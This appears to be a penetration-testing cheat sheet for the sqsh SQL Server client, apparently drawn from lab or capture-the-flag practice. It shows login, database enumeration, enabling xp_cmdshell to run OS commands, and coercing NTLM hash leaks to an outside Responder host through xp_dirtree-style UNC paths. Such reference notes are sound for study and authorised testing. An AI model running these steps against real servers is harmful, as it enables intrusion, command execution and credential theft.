Sqsh

Description

Sqsh (pronounced skwish) is short for SQshelL (pronounced s-q-shell), it is intended as a replacement for the venerable 'isql' program supplied by SAP Sybase. Sqsh is much more than a nice prompt (a la 'dsql', from David B. Joyner), it is intended to provide much of the functionality provided by a good shell, such as variables, aliasing, redirection, pipes, back-grounding, job control, history, command substitution, and dynamic configuration. Also, as a by-product of the design, it is remarkably easy to extend and add functionality.

Usage

Login

sqsh -S 10.10.10.10 -U qu35t -P 'Passw0rd!'

Enumeration

List databasesList tables of a databaseExtract data from a table

select name from sys.databases;
go

select TABLE_NAME from Backup.INFORMATION_SCHEMA.TABLES;
go

select * from Backup.dbo.Users;
go

Command Execution

Enable the moduleReconfigureExecute a command

EXEC SP_CONFIGURE 'show advanced options', 1
EXEC SP_CONFIGURE 'xp_cmdshell', 1

reconfigure
go

xp_cmdshell "whoami" 
go

Get user hash

Start the responderxp_dirtreexp_subdirsxp_fileexist

responder -I tun0

xp_dirtree "\\10.10.14.10\qu35t\"
go

xp_subdirs "\\10.10.14.10\qu35t\"
go

xp_fileexist "\\10.10.14.10\qu35t\"
go

References

• Github - Official
• Ippsec - Tally